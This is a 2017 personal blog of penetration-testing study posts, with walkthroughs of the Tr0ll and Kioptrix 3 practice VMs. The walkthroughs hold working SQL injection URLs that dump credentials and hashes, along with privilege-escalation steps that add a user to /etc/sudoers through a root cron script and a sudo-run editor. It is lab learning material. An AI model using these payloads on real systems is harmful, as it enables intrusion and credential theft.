Monday, March 6, 2017

Learn Penetration Testing A Discord Chat Where Everyone Is The Same!

A few weeks ago I came across a post on reddit.com/r/netsecstudents about a Discord for pen testing. So far I have found this to be a great group of people to chat with and a great resource.

Check it out and join the community.

https://discordapp.com/invite/pWq4cuN

Sunday, February 19, 2017

PWK (OSCP) - So it begins

My 90 days for the PWK course has started.

I have the first 90 pages of the PWK course material completed and have started to perform some intel gathering on the PWK lab environment. I've also watched a good number of the videos so far. I plan to complete all the exercises and document the lab environment. These apply towards the exam, which can help with passing. Passing score is 70 points. Both completed with award up to 10 points. Not a lot but its enough to make the difference between a pass or a fail.

I'm a bit overwhelmed because there is a lot here for me to learn. Once I've gotten familiar with the lab environment I'm sure I'll start getting root on these boxes. As I learn I'll take "breaks" from the PWK course and knock out a vulnerable VM or two as time permits.

Tuesday, February 7, 2017

Tr0ll

I heard about this VM on /r/netsecstudents (I forget what post). I figured I would give this one a shot, even if its meant to be a bit more difficult then the three Kioptrix VM's I've written about so far.

Right off the bat I perform a nmap and a nikto scan. Nmap showed a few open ports.

root@kali:~# nmap -T4 -A -v 192.168.0.129

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-07 20:09 EST
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating ARP Ping Scan at 20:09
Scanning 192.168.0.129 [1 port]
Completed ARP Ping Scan at 20:09, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:09
Completed Parallel DNS resolution of 1 host. at 20:09, 0.06s elapsed
Initiating SYN Stealth Scan at 20:09
Scanning 192.168.0.129 [1000 ports]
Discovered open port 21/tcp on 192.168.0.129
Discovered open port 22/tcp on 192.168.0.129
Discovered open port 80/tcp on 192.168.0.129
Completed SYN Stealth Scan at 20:09, 0.05s elapsed (1000 total ports)
Initiating Service scan at 20:09
Scanning 3 services on 192.168.0.129
Completed Service scan at 20:09, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.129
NSE: Script scanning 192.168.0.129.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.23s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Nmap scan report for 192.168.0.129
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:5B:3D:FD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.001 days (since Tue Feb  7 20:08:02 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms 192.168.0.129

NSE: Script Post-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)



At this point I checked out what a web browser could show:
The page source didn't show much:
<html>
<img src=hacker.jpg>
</html>

This is where the nikto scan cam in handy.
root@kali:~# nikto -h 192.168.0.129
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.129
+ Target Hostname:    192.168.0.129
+ Target Port:        80
+ Start Time:         2017-02-07 20:11:48 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-02-07 20:12:03 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#


Checking out 192.168.0.129/secrets (which is pointed out in the robots.txt page) got another meme:


<html>
<img src="troll.jpg">
</html>

icons/readme had (among other stuff).

Suggested Uses

The following are a few suggestions, to serve as a starting point for ideas.
Please feel free to tweak and rename the icons as you like.

     a.gif
          This might be used to represent PostScript or text layout
          languages.

     alert.black.gif, alert.red.gif
          These can be used to highlight any important items, such as a
          README file in a directory.

     back.gif, forward.gif
          These can be used as links to go to previous and next areas.

     ball.gray.gif, ball.red.gif
          These might be used as bullets.


Going back to the nmap scan I decided to check out the ftp port by going to ftp://192.168.0.129/



This pcap file shows the ftp transfer of secret_stuff.txt. At first I was reading too much into this, thinking I should try and extract the .txt file. I did encounter a great blog showing how to do this though:
https://shankaraman.wordpress.com/tag/how-to-extract-ftp-files-from-wireshark-packet/


"FTP Data Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n\nSucks, you were so close... gotta TRY HARDER!\n)"



sup3rs3cr3tdirlol - secret directory huh. might as well try to find this. Second try and I got it

192.168.0.129/sup3rs3cr3tdirlol (first try I tried sup3rs3cr3t)


 Another file to decipher...... more trolling. After downloading the I found out the file was an ELF binary.
 

I spent a good amount of time looking up how to edit/view a binary. Even spending a decent amount of time in edb. I was looking for a clue, troll or something at a memory address of "0x0856BF"
http://i2.kym-cdn.com/entries/icons/facebook/000/006/725/desk_flip.jpg


 As an act of pure luck I decided to try "0x0856BF" as part of a web address.




 good_luck/ contained a text file called "which_one_lol.txt"
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
While this_folder_contains_the_password/ contained a text file called "Pass.txt"
Good_job_:)

The folder says the password is in the folder so I guess is password is "Pass.txt" (not Good_job_:))
At first I thought it was genphlux and "Pass.txt" as the password
After many more guesses I get in with the username: overflow

After a good bit of looking around I found another clue.... maybe even a troll:
Before going further I was kicked out (2nd time it happened).

cleaner.py is a python script that performs: "rm -r /tmp/*". Cool thing is this file has rwx permissions for all users. If the file is edited to grant the user overflow root permissions then we're set. The catch is the script needs to run as root to edit sudoers file. Which is a waiting game since the script is already in the crontab.

try:
        os.system('echo overflow        ALL=(ALL) ALL >> /etc/sudoers ')
except:
        sys.exit()


and we have root!
-----------------------------------------------------------------------------------------------------------------------------
 While searching around I also got the OS version:
cat /proc/version
Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 



 There's a few privilege escalation exploit for version 3.13. Might as well try it as well. Like I've done before I copy this over to /var/www and get apache running. This way I can get a copy of it onto the Tr0ll box. I ended up trying four of these before I found one that worked.

There you go. Two ways to get root on this box..... Once you've fought your way past all the Trolling!




Saturday, February 4, 2017

Kioptrix level 3

With another busy week behind its due for another post. Continuing with the Kioptrix series I've selected Kioptrix 3 for this weekend. After downloading the VM I noticed the readme.txt in the download:

DISCLAIMER!
We at Kioptrix are not responsible for any damaged directly, or indirectly,
caused by using this system. We suggest you do not connect this installation
to the Internet.
It is, after all, a vulnerable setup.
Please keep this in mind when playing the game.

This machine is setup to use DHCP.
Before playing the game, please modify your attacker's hosts file.

<ip>    kioptrix3.com
This challenge contains a Web Application.


If you have any questions, please direct them to:
comms[at]kioptrix.com


Hope you enjoy this challenge.
-Kioptrix Team


My first go at this VM was fraught with frustration. Its not until I looked at the readme.txt and noticed this note about the hosts file. Adding this line does help. To help with things I've started using KeepNote for recording my progress with each vulnerable VM.

After booting up Kioptrix 3 and Kali I start with the usual:

root@kali:~# nmap 192.168.0.198

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-04 21:35 EST
Nmap scan report for 192.168.0.198
Host is up (0.000066s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:C7:D9:56 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

------------------------------------------------------------------------------
root@kali:~# nmap -T4 -A -v 192.168.0.198
.

.
.
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...








Kioptrix 3 has Apache running on it. Lets take a look:


We have a Blog page, Login and if you this page there is a gallery system. For this VM I've also decided to try out a new tool (for me), Nikto.
I also ran a scan on the gallery page:
root@kali:~# nikto -host http://192.168.0.198/gallery
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.198
+ Target Hostname:    192.168.0.198
+ Target Port:        80
+ Start Time:         2017-02-04 19:01:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /gallery/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /gallery/db.sql, inode: 630988, size: 3573, mtime: Sat Oct 10 15:43:52 2009
+ OSVDB-3092: /gallery/db.sql: Database SQL?
+ /gallery/login.php: Admin login page/section found.
+ 7534 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2017-02-04 19:01:28 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested



These two highlighted parts caught my attention. Lets see what they show in the browser:

So I just got the DB structure. I'm going to save this for later. Further down on this page I also get this gem:


CREATE TABLE IF NOT EXISTS `gallarific_users` (
  `userid` int(11) NOT NULL auto_increment,
 `username` varchar(100) NOT NULL default '',
`password` varchar(100) NOT NULL default '',
  `usertype` enum('superuser','normaluser') NOT NULL default 'superuser',
  `firstname` varchar(100) NOT NULL default '',
  `lastname` varchar(100) NOT NULL default '',
  `email` varchar(255) NOT NULL default '',
  `datejoined` int(11) NOT NULL default '0',
  `website` varchar(255) NOT NULL default '',
  `issuperuser` tinyint(4) NOT NULL default '0',
  `photo` varchar(100) NOT NULL default '',
  `joincode` varchar(20) NOT NULL default '',
  PRIMARY KEY  (`userid`)
)
;

After clicking on the Press  Room I notice a drop down menu for sorting options. After clicking it notice 'id' in the url.

http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos

Throwing in a single quote (http://kioptrix3.com/gallery/gallery.php?id=') into the url returns this error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by parentid,sort,name' at line 1Could not select category

After a lot of playing around I get an SQL injection to work:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%201,2,3,4,5,6

Changing the SQL Injection to:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%201,@@version,3,4,5,6
    5.0.51a-3ubuntu5.4

Since I've learned the table and column names from earlier I can get the username and password from the DB:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%20userid,username,password,4,5,6%20FROM%20gallarific_users

   admin//n0t7t1k4

This could be used for logging into the site, but I don't think this is a dev account. To prove this I tried logging in with this username. No luck.  Time to look for another table:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%201,2,group_concat%28table_name%29,4,5,6%20from%20information_schema.tables

Gets us:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,
SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,dev_accounts,
gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallari

Changing my earlier injection to:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%201,2,concat%28username,char%2858%29,password%29,4,5,6%20FROM%20dev_accounts

loneferret:5badcaf789d3d1d09794d8f021f40f0e
dreg:0d3eccfb887aabd50f243b3f155c0f85

From the blog site loneferret is the new admin for the site. This is the username I want.

I used crackstation.net to crack these hashes:
With this now I try to login to phpmyadmin and the lotusCMS login pages, no luck. BUT SSH works:
An ls of loneferret's home directory shows:
checksec.sh and CompanyPolicy.README

checksec.sh description shows:
# Name    : checksec.sh
# Version : 1.4
# Author  : Tobias Klein
# Date    : January 2011
# Download: http://www.trapkit.de/tools/checksec.html
# Changes : http://www.trapkit.de/tools/checksec_changes.txt
#
# Description:
#
# Modern Linux distributions offer some mitigation techniques to make it
# harder to exploit software vulnerabilities reliably. Mitigations such
# as RELRO, NoExecute (NX), Stack Canaries, Address Space Layout
# Randomization (ASLR) and Position Independent Executables (PIE) have
# made reliably exploiting any vulnerabilities that do exist far more
# challenging. The checksec.sh script is designed to test what *standard*
# Linux OS and PaX (http://pax.grsecurity.net/) security features are being
# used.
#
# As of version 1.3 the script also lists the status of various Linux kernel
# protection mechanisms.


CompanyPolicy.README shows:
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$


To get root, I need to sudo su. but this isn't allowed at the moment. I need to edit the sudoers file. ht will do the trick.
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers                                                                                                                                                                                                                                                                                                                                                                                     
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers

After a quick Google search of the error I found the answer on this stackoverflow.com page:
http://stackoverflow.com/questions/6804208/nano-error-error-opening-terminal-xterm-256color





I've edited the file so loneferret can do all the things that root can.

loneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret:
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret# cd
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS:
http://www.lotuscms.org

Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

root@Kioptrix3:~#